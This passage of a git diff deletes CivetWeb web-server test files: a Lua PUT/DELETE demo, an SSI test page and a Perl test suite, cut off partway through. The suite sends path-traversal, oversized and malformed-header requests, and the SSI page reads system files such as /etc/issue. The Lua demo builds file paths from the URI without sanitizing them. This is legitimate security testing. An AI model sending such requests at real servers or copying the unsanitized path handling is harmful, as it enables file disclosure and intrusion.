--- This is a Lua script that handles sub-resources, e.g. resource_script_demo.lua/path/file.ext

-

-scriptUri = "resource_script_demo.lua"

-envVar = "resource_script_demo_storage"

-

-resourcedir = os.getenv(envVar) or "R:\\RESOURCEDIR"

-method = mg.request_info.request_method:upper()

-

-if resourcedir then

-  attr = lfs.attributes(resourcedir)

-end

-

-if (not mg.request_info.uri:find(scriptUri)) or (not resourcedir) or (not attr) or (attr.mode~="directory") then

-    mg.write("HTTP/1.0 500 OK\r\n")

-    mg.write("Connection: close\r\n")

-    mg.write("Content-Type: text/html; charset=utf-8\r\n")

-    mg.write("\r\n")

-    mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-    mg.write("<body>\r\nServer error.<br>\r\n")

-    mg.write("The server admin must make sure this script is available as URI " .. scriptUri .. "<br>\r\n")

-    mg.write("The server admin must set the environment variable " .. envVar .. " to a directory.<br>\r\n")

-    mg.write("</body>\r\n</html>\r\n")

-    return

-end

-subresource = mg.request_info.uri:match(scriptUri .. "/(.*)")

-

-if not subresource then

-    if method=="GET" then

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>No resource specified.<br>resourcedir is " .. resourcedir .. "</body></html>\r\n")

-    else

-        mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Method not allowed.</body></html>\r\n")

-    end

-    return

-end

-

-

-if method=="GET" then

-    file = resourcedir .. "/" .. subresource

-    if lfs.attributes(file) then

-        mg.send_file(file)

-    else

-        mime = mg.get_mime_type(file)

-        mg.write("HTTP/1.0 404 Not Found\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" not found.</body></html>\r\n")

-    end

-    return

-end

-

-if method=="PUT" then

-    file = resourcedir .. "/" .. subresource

-    mime = mg.get_mime_type(file)

-    if lfs.attributes(file) then

-        mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" already exists.</body></html>\r\n")

-    else

-        local f = io.open(file, "w")

-

-        local data = {}

-        repeat

-            local l = mg.read();

-            data[#data+1] = l;

-        until ((l == "") or (l == nil));

-

-        f:write(table.concat(data, ""))

-        f:close()

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" created.</body></html>\r\n")

-    end

-    return

-end

-

-if method=="DELETE" then

-    file = resourcedir .. "/" .. subresource

-    mime = mg.get_mime_type(file)

-    if lfs.attributes(file) then

-        os.remove(file)

-        mg.write("HTTP/1.0 200 OK\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" deleted.</body></html>\r\n")

-    else

-        mime = mg.get_mime_type(file)

-        mg.write("HTTP/1.0 404 Not Found\r\n")

-        mg.write("Connection: close\r\n")

-        mg.write("Content-Type: text/html; charset=utf-8\r\n")

-        mg.write("\r\n")

-        mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-        mg.write("<body>Resource of type \"" .. mime .. "\" not found.</body></html>\r\n")

-    end

-    return

-end

-

--- Any other method

-mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html; charset=utf-8\r\n")

-mg.write("\r\n")

-mg.write("<html><head><title>Civetweb Lua script resource handling test</title></head>\r\n")

-mg.write("<body>Method not allowed.</body></html>\r\n")

-

diff --git a/thirdparty/civetweb-1.10/test/shared.c b/thirdparty/civetweb-1.10/test/shared.c
deleted file mode 100644
index a35a863..0000000
--- a/thirdparty/civetweb-1.10/test/shared.c
+++ /dev/null
@@ -1,48 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifdef _MSC_VER
-#if !defined(_CRT_SECURE_NO_WARNINGS)
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#if !defined(_CRT_SECURE_NO_DEPRECATE)
-#define _CRT_SECURE_NO_DEPRECATE
-#endif
-#endif
-
-#include "shared.h"
-#include <string.h>
-
-static char s_test_directory[1024] = {'\0'};
-
-const char *
-get_test_directory(void)
-{
-	return s_test_directory;
-}
-
-void
-set_test_directory(const char *const path)
-{
-	strncpy(s_test_directory,
-	        path,
-	        sizeof(s_test_directory) / sizeof(s_test_directory[0]));
-}
diff --git a/thirdparty/civetweb-1.10/test/shared.h b/thirdparty/civetweb-1.10/test/shared.h
deleted file mode 100644
index 937fcff..0000000
--- a/thirdparty/civetweb-1.10/test/shared.h
+++ /dev/null
@@ -1,27 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_SHARED_H_
-#define TEST_SHARED_H_
-
-const char *get_test_directory(void);
-void set_test_directory(const char *const path);
-
-#endif /* TEST_SHARED_H_ */
diff --git a/thirdparty/civetweb-1.10/test/ssi_test.shtml b/thirdparty/civetweb-1.10/test/ssi_test.shtml
deleted file mode 100644
index eb03d17..0000000
--- a/thirdparty/civetweb-1.10/test/ssi_test.shtml
+++ /dev/null
@@ -1,37 +0,0 @@
-<!doctype html>
-<html lang="en">
-<head>
-  <meta charset="utf-8">
-  <title>The HTML5 Herald</title>
-  <meta name="author" content="CivetWeb developers">
-  <meta name="description" content="CivetWeb Server Side Include (SSI) Test Page">
-</head>
-
-<body>
-  <h1>CivetWeb Server Side Include (SSI) Test Page</h1>
-  <p>Note: Some of the tests below will only work on Windows, others only on Linux, and some probably not on all Linux distributions and all Windows versions.</p>
-
-  <h2>Execute: "cd"</h2>
-  <!--#exec "cd" -->
-  <h2>Execute: "pwd"</h2>
-  <!--#exec "pwd" -->
-
-  <h2>File relative to current document: "hello.txt"</h2>
-  <!--#include file="hello.txt" -->
-  <h2>Short form: "hello.txt"</h2>
-  <!--#include "hello.txt" -->
-
-  <h2>File relative to document root: "hello.txt"</h2>
-  <!--#include virtual="hello.txt" -->
-
-  <h2>File with absolute path: "C:\Windows\system.ini"</h2>
-  <!--#include abspath="C:\Windows\system.ini" -->
-  <h2>File with absolute path: "/etc/issue"</h2>
-  <!--#include abspath="/etc/issue" -->
-
-  <h2>Nested file relative to current documentt: "hello.shtml"</h2>
-  <!--#include file="./hello.shtml" -->
-
-</body>
-</html>
-
diff --git a/thirdparty/civetweb-1.10/test/syntax_error.ssjs b/thirdparty/civetweb-1.10/test/syntax_error.ssjs
deleted file mode 100644
index d8619ed..0000000
--- a/thirdparty/civetweb-1.10/test/syntax_error.ssjs
+++ /dev/null
@@ -1,7 +0,0 @@
-

-conn.write('HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n');

-

-conn.write('Syntax error:');

-

-asdf ghjk qwert 123456789 +-*/

-.!,;

diff --git a/thirdparty/civetweb-1.10/test/test.ico b/thirdparty/civetweb-1.10/test/test.ico
deleted file mode 100644
index 70ab89d..0000000
--- a/thirdparty/civetweb-1.10/test/test.ico
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/test.pl b/thirdparty/civetweb-1.10/test/test.pl
deleted file mode 100755
index e503489..0000000
--- a/thirdparty/civetweb-1.10/test/test.pl
+++ /dev/null
@@ -1,461 +0,0 @@
-#!/usr/bin/env perl
-# This script is used to test Civetweb web server
-
-use IO::Socket;
-use File::Path;
-use Cwd;
-use strict;
-use warnings;
-#use diagnostics;
-
-sub on_windows { $^O =~ /win32/i; }
-
-my $port = 23456;
-my $pid = undef;
-my $num_requests;
-my $dir_separator = on_windows() ? '\\' : '/';
-my $copy_cmd = on_windows() ? 'copy' : 'cp';
-my $test_dir_uri = "test_dir";
-my $root = 'test';
-my $test_dir = $root . $dir_separator. $test_dir_uri;
-my $config = 'civetweb.conf';
-my $exe_ext = on_windows() ? '.exe' : '';
-my $civetweb_exe = '.' . $dir_separator . 'civetweb' . $exe_ext;
-my $embed_exe = '.' . $dir_separator . 'embed' . $exe_ext;
-my $unit_test_exe = '.' . $dir_separator . 'unit_test' . $exe_ext;
-my $exit_code = 0;
-
-my @files_to_delete = ('debug.log', 'access.log', $config, "$root/a/put.txt",
-  "$root/a+.txt", "$root/.htpasswd", "$root/binary_file", "$root/a",
-  "$root/myperl", $embed_exe, $unit_test_exe);
-
-END {
-  unlink @files_to_delete;
-  kill_spawned_child();
-  File::Path::rmtree($test_dir);
-  exit $exit_code;
-}
-
-sub fail {
-  print "FAILED: @_\n";
-  $exit_code = 1;
-  exit 1;
-}
-
-sub get_num_of_log_entries {
-  open FD, "access.log" or return 0;
-  my @lines = (<FD>);
-  close FD;
-  return scalar @lines;
-}
-
-# Send the request to the 127.0.0.1:$port and return the reply
-sub req {
-  my ($request, $inc, $timeout) = @_;
-  my $sock = IO::Socket::INET->new(Proto => 6,
-    PeerAddr => '127.0.0.1', PeerPort => $port);
-  fail("Cannot connect to http://127.0.0.1:$port : $!") unless $sock;
-  $sock->autoflush(1);
-  foreach my $byte (split //, $request) {
-    last unless print $sock $byte;
-    select undef, undef, undef, .001 if length($request) < 256;
-  }
-  my ($out, $buf) = ('', '');
-  eval {
-    alarm $timeout if $timeout;
-    $out .= $buf while (sysread($sock, $buf, 1024) > 0);
-    alarm 0 if $timeout;
-  };
-  close $sock;
-
-  $num_requests += defined($inc) ? $inc : 1;
-  my $num_logs = get_num_of_log_entries();
-
-  unless ($num_requests == $num_logs) {
-    fail("Request has not been logged: [$request], output: [$out]");
-  }
-
-  return $out;
-}
-
-# Send the request. Compare with the expected reply. Fail if no match
-sub o {
-  my ($request, $expected_reply, $message, $num_logs) = @_;
-  print "==> $message ... ";
-  my $reply = req($request, $num_logs);
-  if ($reply =~ /$expected_reply/s) {
-    print "OK\n";
-  } else {
-#fail("Requested: [$request]\nExpected: [$expected_reply], got: [$reply]");
-    fail("Expected: [$expected_reply], got: [$reply]");
-  }
-}
-
-# Spawn a server listening on specified port
-sub spawn {
-  my ($cmdline) = @_;
-  print 'Executing: ', @_, "\n";
-  if (on_windows()) {
-    my @args = split /\s+/, $cmdline;
-    my $executable = $args[0];
-    Win32::Spawn($executable, $cmdline, $pid);
-    die "Cannot spawn @_: $!" unless $pid;
-  } else {
-    unless ($pid = fork()) {
-      exec $cmdline;
-      die "cannot exec [$cmdline]: $!\n";
-    }
-  }
-  sleep 1;
-}
-
-sub write_file {
-  open FD, ">$_[0]" or fail "Cannot open $_[0]: $!";
-  binmode FD;
-  print FD $_[1];
-  close FD;
-}
-
-sub read_file {
-  open FD, $_[0] or fail "Cannot open $_[0]: $!";
-  my @lines = <FD>;
-  close FD;
-  return join '', @lines;
-}
-
-sub kill_spawned_child {
-  if (defined($pid)) {
-    kill(9, $pid);
-    waitpid($pid, 0);
-  }
-}
-
-####################################################### ENTRY POINT
-
-unlink @files_to_delete;
-$SIG{PIPE} = 'IGNORE';
-$SIG{ALRM} = sub { die "timeout\n" };
-#local $| =1;
-
-# Make sure we export only symbols that start with "mg_", and keep local
-# symbols static.
-if ($^O =~ /darwin|bsd|linux/) {
-  my $out = `(cc -c src/civetweb.c && nm src/civetweb.o) | grep ' T '`;
-  foreach (split /\n/, $out) {
-    /T\s+_?mg_.+/ or fail("Exported symbol $_")
-  }
-}
-
-if (scalar(@ARGV) > 0 and $ARGV[0] eq 'unit') {
-  do_unit_test();
-  exit 0;
-}
-
-# Make sure we load config file if no options are given.
-# Command line options override config files settings
-write_file($config, "access_log_file access.log\n" .
-           "listening_ports 127.0.0.1:12345\n");
-spawn("$civetweb_exe -listening_ports 127.0.0.1:$port");
-o("GET /test/hello.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'Loading config file');
-unlink $config;
-kill_spawned_child();
-
-# Spawn the server on port $port
-my $cmd = "$civetweb_exe ".
-  "-listening_ports 127.0.0.1:$port ".
-  "-access_log_file access.log ".
-  "-error_log_file debug.log ".
-  "-cgi_environment CGI_FOO=foo,CGI_BAR=bar,CGI_BAZ=baz " .
-  "-extra_mime_types .bar=foo/bar,.tar.gz=blah,.baz=foo " .
-  '-put_delete_auth_file test/passfile ' .
-  '-access_control_list -0.0.0.0/0,+127.0.0.1 ' .
-  "-document_root $root ".
-  "-hide_files_patterns **exploit.PL ".
-  "-enable_keep_alive yes ".
-  "-url_rewrite_patterns /aiased=/etc/,/ta=$test_dir";
-$cmd .= ' -cgi_interpreter perl' if on_windows();
-spawn($cmd);
-
-o("GET /hello.txt HTTP/1.1\nConnection: close\nRange: bytes=3-50\r\n\r\n",
-  'Content-Length: 15\s', 'Range past the file end');
-
-o("GET /hello.txt HTTP/1.1\n\n   GET /hello.txt HTTP/1.0\n\n",
-  'HTTP/1.1 200.+keep-alive.+HTTP/1.1 200.+close',
-  'Request pipelining', 2);
-
-my $x = 'x=' . 'A' x (200 * 1024);
-my $len = length($x);
-o("POST /env.cgi HTTP/1.0\r\nContent-Length: $len\r\n\r\n$x",
-  '^HTTP/1.1 200 OK', 'Long POST');
-
-# Try to overflow: Send very long request
-req('POST ' . '/..' x 100 . 'ABCD' x 3000 . "\n\n", 0); # don't log this one
-
-o("GET /hello.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'GET regular file');
-o("GET /hello.txt HTTP/1.0\nContent-Length: -2147483648\n\n",
-  'HTTP/1.1 200 OK', 'Negative content length');
-o("GET /hello.txt HTTP/1.0\n\n", 'Content-Length: 17\s',
-  'GET regular file Content-Length');
-o("GET /%68%65%6c%6c%6f%2e%74%78%74 HTTP/1.0\n\n",
-  'HTTP/1.1 200 OK', 'URL-decoding');
-
-# Break CGI reading after 1 second. We must get full output.
-# Since CGI script does sleep, we sleep as well and increase request count
-# manually.
-my $slow_cgi_reply;
-print "==> Slow CGI output ... ";
-fail('Slow CGI output forward reply=', $slow_cgi_reply) unless
-  ($slow_cgi_reply = req("GET /timeout.cgi HTTP/1.0\r\n\r\n", 0, 1)) =~ /Some data/s;
-print "OK\n";
-sleep 3;
-$num_requests++;
-
-# '+' in URI must not be URL-decoded to space
-write_file("$root/a+.txt", '');
-o("GET /a+.txt HTTP/1.0\n\n", 'HTTP/1.1 200 OK', 'URL-decoding, + in URI');
-
-# Test HTTP version parsing
-o("GET / HTTPX/1.0\r\n\r\n", '^HTTP/1.1 500', 'Bad HTTP Version', 0);
-o("GET / HTTP/x.1\r\n\r\n", '^HTTP/1.1 505', 'Bad HTTP maj Version', 0);
-o("GET / HTTP/1.1z\r\n\r\n", '^HTTP/1.1 505', 'Bad HTTP min Version', 0);
-o("GET / HTTP/02.0\r\n\r\n", '^HTTP/1.1 505', 'HTTP Version >1.1', 0);
-
-# File with leading single dot
-o("GET /.leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 1');
-o("GET /...leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 2');
-o("GET /../\\\\/.//...leading.dot.txt HTTP/1.0\n\n", 'abc123', 'Leading dot 3')
-  if on_windows();
-o("GET .. HTTP/1.0\n\n", '400 Bad Request', 'Leading dot 4', 0);
-
-mkdir $test_dir unless -d $test_dir;
-o("GET /$test_dir_uri/not_exist HTTP/1.0\n\n",
-  'HTTP/1.1 404', 'PATH_INFO loop problem');
-o("GET /$test_dir_uri HTTP/1.0\n\n", 'HTTP/1.1 301', 'Directory redirection');
-o("GET /$test_dir_uri/ HTTP/1.0\n\n", 'Modified', 'Directory listing');
-write_file("$test_dir/index.html", "tralala");
-o("GET /$test_dir_uri/ HTTP/1.0\n\n", 'tralala', 'Index substitution');
-o("GET / HTTP/1.0\n\n", 'embed.c', 'Directory listing - file name');
-o("GET /ta/ HTTP/1.0\n\n", 'Modified', 'Aliases');
-o("GET /not-exist HTTP/1.0\r\n\n", 'HTTP/1.1 404', 'Not existent file');
-mkdir $test_dir . $dir_separator . 'x';
-my $path = $test_dir . $dir_separator . 'x' . $dir_separator . 'index.cgi';
-write_file($path, read_file($root . $dir_separator . 'env.cgi'));
-chmod(0755, $path);
-o("GET /$test_dir_uri/x/ HTTP/1.0\n\n", "Content-Type: text/html\r\n\r\n",
-  'index.cgi execution');
-
-my $cwd = getcwd();
-o("GET /$test_dir_uri/x/ HTTP/1.0\n\n",
-  "SCRIPT_FILENAME=$cwd/test/test_dir/x/index.cgi", 'SCRIPT_FILENAME');
-o("GET /ta/x/ HTTP/1.0\n\n", "SCRIPT_NAME=/ta/x/index.cgi",
-  'Aliases SCRIPT_NAME');
-o("GET /hello.txt HTTP/1.1\nConnection: close\n\n", 'Connection: close',
-  'No keep-alive');
-
-$path = $test_dir . $dir_separator . 'x' . $dir_separator . 'a.cgi';
-system("ln -s `which perl` $root/myperl") == 0 or fail("Can't symlink perl");
-write_file($path, "#!../../myperl\n" .
-           "print \"Content-Type: text/plain\\n\\nhi\";");
-chmod(0755, $path);
-o("GET /$test_dir_uri/x/a.cgi HTTP/1.0\n\n", "hi", 'Relative CGI interp path');
-o("GET * HTTP/1.0\n\n", "^HTTP/1.1 404", '* URI');
-
-my $mime_types = {
-  html => 'text/html',
-  htm => 'text/html',
-  txt => 'text/plain',
-  unknown_extension => 'text/plain',
-  js => 'application/x-javascript',
-  css => 'text/css',
-  jpg => 'image/jpeg',
-  c => 'text/plain',
-  'tar.gz' => 'blah',
-  bar => 'foo/bar',
-  baz => 'foo',
-};
-
-foreach my $key (keys %$mime_types) {
-  my $filename = "_mime_file_test.$key";
-  write_file("$root/$filename", '');
-  o("GET /$filename HTTP/1.0\n\n",
-    "Content-Type: $mime_types->{$key}", ".$key mime type");
-  unlink "$root/$filename";
-}
-
-# Get binary file and check the integrity
-my $binary_file = 'binary_file';
-my $f2 = '';
-foreach (0..123456) { $f2 .= chr(int(rand() * 255)); }
-write_file("$root/$binary_file", $f2);
-my $f1 = req("GET /$binary_file HTTP/1.0\r\n\n");
-while ($f1 =~ /^.*\r\n/) { $f1 =~ s/^.*\r\n// }
-$f1 eq $f2 or fail("Integrity check for downloaded binary file");
-
-my $range_request = "GET /hello.txt HTTP/1.1\nConnection: close\n".
-"Range: bytes=3-5\r\n\r\n";
-o($range_request, '206 Partial Content', 'Range: 206 status code');
-o($range_request, 'Content-Length: 3\s', 'Range: Content-Length');
-o($range_request, 'Content-Range: bytes 3-5/17', 'Range: Content-Range');
-o($range_request, '\nple$', 'Range: body content');
-
-# Test directory sorting. Sleep between file creation for 1.1 seconds,
-# to make sure modification time are different.
-mkdir "$test_dir/sort";
-write_file("$test_dir/sort/11", 'xx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/aa", 'xxxx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/bb", 'xxx');
-select undef, undef, undef, 1.1;
-write_file("$test_dir/sort/22", 'x');
-
-o("GET /$test_dir_uri/sort/?n HTTP/1.0\n\n",
-  '200 OK.+>11<.+>22<.+>aa<.+>bb<',
-  'Directory listing (name, ascending)');
-o("GET /$test_dir_uri/sort/?nd HTTP/1.0\n\n",
-  '200 OK.+>bb<.+>aa<.+>22<.+>11<',
-  'Directory listing (name, descending)');
-o("GET /$test_dir_uri/sort/?s HTTP/1.0\n\n",
-  '200 OK.+>22<.+>11<.+>bb<.+>aa<',
-  'Directory listing (size, ascending)');
-o("GET /$test_dir_uri/sort/?sd HTTP/1.0\n\n",
-  '200 OK.+>aa<.+>bb<.+>11<.+>22<',
-  'Directory listing (size, descending)');
-o("GET /$test_dir_uri/sort/?d HTTP/1.0\n\n",
-  '200 OK.+>11<.+>aa<.+>bb<.+>22<',
-  'Directory listing (modification time, ascending)');
-o("GET /$test_dir_uri/sort/?dd HTTP/1.0\n\n",
-  '200 OK.+>22<.+>bb<.+>aa<.+>11<',
-  'Directory listing (modification time, descending)');
-
-unless (scalar(@ARGV) > 0 and $ARGV[0] eq "basic_tests") {
-  # Check that .htpasswd file existence trigger authorization
-  write_file("$root/.htpasswd", 'user with space, " and comma:mydomain.com:5deda12442309cbdcdffc6b2737a894f');
-  o("GET /hello.txt HTTP/1.1\n\n", '401 Unauthorized',
-    '.htpasswd - triggering auth on file request');
-  o("GET / HTTP/1.1\n\n", '401 Unauthorized',
-    '.htpasswd - triggering auth on directory request');
-
-  # Test various funky things in an authentication header.
-  o("GET /hello.txt HTTP/1.0\nAuthorization: Digest   eq== empty=\"\", empty2=, quoted=\"blah foo bar, baz\\\"\\\" more\\\"\", unterminatedquoted=\" doesn't stop\n\n",
-    '401 Unauthorized', 'weird auth values should not cause crashes');
-  my $auth_header = "Digest username=\"user with space, \\\" and comma\", ".
-    "realm=\"mydomain.com\", nonce=\"1291376417\", uri=\"/\",".
-    "response=\"e8dec0c2a1a0c8a7e9a97b4b5ea6a6e6\", qop=auth, nc=00000001, cnonce=\"1a49b53a47a66e82\"";
-  o("GET /hello.txt HTTP/1.0\nAuthorization: $auth_header\n\n", 'HTTP/1.1 200 OK', 'GET regular file with auth');
-  o("GET / HTTP/1.0\nAuthorization: $auth_header\n\n", '^(.(?!(.htpasswd)))*$',
-    '.htpasswd is hidden from the directory list');
-  o("GET / HTTP/1.0\nAuthorization: $auth_header\n\n", '^(.(?!(exploit.pl)))*$',
-    'hidden file is hidden from the directory list');
-  o("GET /.htpasswd HTTP/1.0\nAuthorization: $auth_header\n\n",
-    '^HTTP/1.1 404 ', '.htpasswd must not be shown');
-  o("GET /exploit.pl HTTP/1.0\nAuthorization: $auth_header\n\n",
-    '^HTTP/1.1 404', 'hidden files must not be shown');
-  unlink "$root/.htpasswd";
-
-
-  o("GET /dir%20with%20spaces/hello.cgi HTTP/1.0\n\r\n",
-      'HTTP/1.1 200 OK.+hello', 'CGI script with spaces in path');
-  o("GET /env.cgi HTTP/1.0\n\r\n", 'HTTP/1.1 200 OK', 'GET CGI file');
-  o("GET /bad2.cgi HTTP/1.0\n\n", "HTTP/1.1 123 Please pass me to the client\r",
-    'CGI Status code text');
-  o("GET /sh.cgi HTTP/1.0\n\r\n", 'shell script CGI',
-    'GET sh CGI file') unless on_windows();
-  o("GET /env.cgi?var=HELLO HTTP/1.0\n\n", 'QUERY_STRING=var=HELLO',
-    'QUERY_STRING wrong');
-  o("POST /env.cgi HTTP/1.0\r\nContent-Length: 9\r\n\r\nvar=HELLO",
-    'var=HELLO', 'CGI POST wrong');
-  o("POST /env.cgi HTTP/1.0\r\nContent-Length: 9\r\n\r\nvar=HELLO",
-    '\x0aCONTENT_LENGTH=9', 'Content-Length not being passed to CGI');
-  o("GET /env.cgi HTTP/1.0\nMy-HdR: abc\n\r\n",
-    'HTTP_MY_HDR=abc', 'HTTP_* env');
-  o("GET /env.cgi HTTP/1.0\n\r\nSOME_TRAILING_DATA_HERE",
-    'HTTP/1.1 200 OK', 'GET CGI with trailing data');
-
-  o("GET /env.cgi%20 HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%20)');
-  o("GET /env.cgi%ff HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%ff)');
-  o("GET /env.cgi%2e HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%2e)');
-  o("GET /env.cgi%2b HTTP/1.0\n\r\n",
-    'HTTP/1.1 404', 'CGI Win32 code disclosure (%2b)');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nHTTPS=off\n', 'CGI HTTPS');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_FOO=foo\n', '-cgi_env 1');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_BAR=bar\n', '-cgi_env 2');
-  o("GET /env.cgi HTTP/1.0\n\r\n", '\nCGI_BAZ=baz\n', '-cgi_env 3');
-  o("GET /env.cgi/a/b/98 HTTP/1.0\n\r\n", 'PATH_INFO=/a/b/98\n', 'PATH_INFO');
-  o("GET /env.cgi/a/b/9 HTTP/1.0\n\r\n", 'PATH_INFO=/a/b/9\n', 'PATH_INFO');
-
-  # Check that CGI's current directory is set to script's directory
-  my $copy_cmd = on_windows() ? 'copy' : 'cp';
-  system("$copy_cmd $root" . $dir_separator .  "env.cgi $test_dir" .
-    $dir_separator . 'env.cgi');
-  o("GET /$test_dir_uri/env.cgi HTTP/1.0\n\n",
-    "CURRENT_DIR=.*$root/$test_dir_uri", "CGI chdir()");
-
-  # SSI tests
-  o("GET /ssi1.shtml HTTP/1.0\n\n",
-    'ssi_begin.+CFLAGS.+ssi_end', 'SSI #include file=');
-  o("GET /ssi2.shtml HTTP/1.0\n\n",
-    'ssi_begin.+Unit test.+ssi_end', 'SSI #include virtual=');
-  my $ssi_exec = on_windows() ? 'ssi4.shtml' : 'ssi3.shtml';
-  o("GET /$ssi_exec HTTP/1.0\n\n",
-    'ssi_begin.+Makefile.+ssi_end', 'SSI #exec');
-  my $abs_path = on_windows() ? 'ssi6.shtml' : 'ssi5.shtml';
-  my $word = on_windows() ? 'boot loader' : 'root';
-  o("GET /$abs_path HTTP/1.0\n\n",
-    "ssi_begin.+$word.+ssi_end", 'SSI #include abspath');
-  o("GET /ssi7.shtml HTTP/1.0\n\n",
-    'ssi_begin.+Unit test.+ssi_end', 'SSI #include "..."');
-  o("GET /ssi8.shtml HTTP/1.0\n\n",
-    'ssi_begin.+CFLAGS.+ssi_end', 'SSI nested #includes');
-
-  # Manipulate the passwords file
-  my $path = 'test_htpasswd';
-  unlink $path;
-  system("$civetweb_exe -A $path a b c") == 0
-    or fail("Cannot add user in a passwd file");
-  system("$civetweb_exe -A $path a b c2") == 0
-    or fail("Cannot edit user in a passwd file");
-  my $content = read_file($path);
-  $content =~ /^b:a:\w+$/gs or fail("Bad content of the passwd file");
-  unlink $path;
-
-  do_PUT_test();
-  kill_spawned_child();
-  do_unit_test();
-}
-
-sub do_PUT_test {
-  # This only works because civetweb currently doesn't look at the nonce.
-  # It should really be rejected...
-  my $auth_header = "Authorization: Digest  username=guest, ".
-  "realm=mydomain.com, nonce=1145872809, uri=/put.txt, ".
-  "response=896327350763836180c61d87578037d9, qop=auth, ".
-  "nc=00000002, cnonce=53eddd3be4e26a98\n";
-
-  o("PUT /a/put.txt HTTP/1.0\nContent-Length: 7\n$auth_header\n1234567",
-    "HTTP/1.1 201 OK", 'PUT file, status 201');
-  fail("PUT content mismatch")
-  unless read_file("$root/a/put.txt") eq '1234567';
-  o("PUT /a/put.txt HTTP/1.0\nContent-Length: 4\n$auth_header\nabcd",
-    "HTTP/1.1 200 OK", 'PUT file, status 200');
-  fail("PUT content mismatch")
-  unless read_file("$root/a/put.txt") eq 'abcd';
-  o("PUT /a/put.txt HTTP/1.0\n$auth_header\nabcd",
-    "HTTP/1.1 411 Length Required", 'PUT 411 error');
-  o("PUT /a/put.txt HTTP/1.0\nExpect: blah\nContent-Length: 1\n".
-    "$auth_header\nabcd",
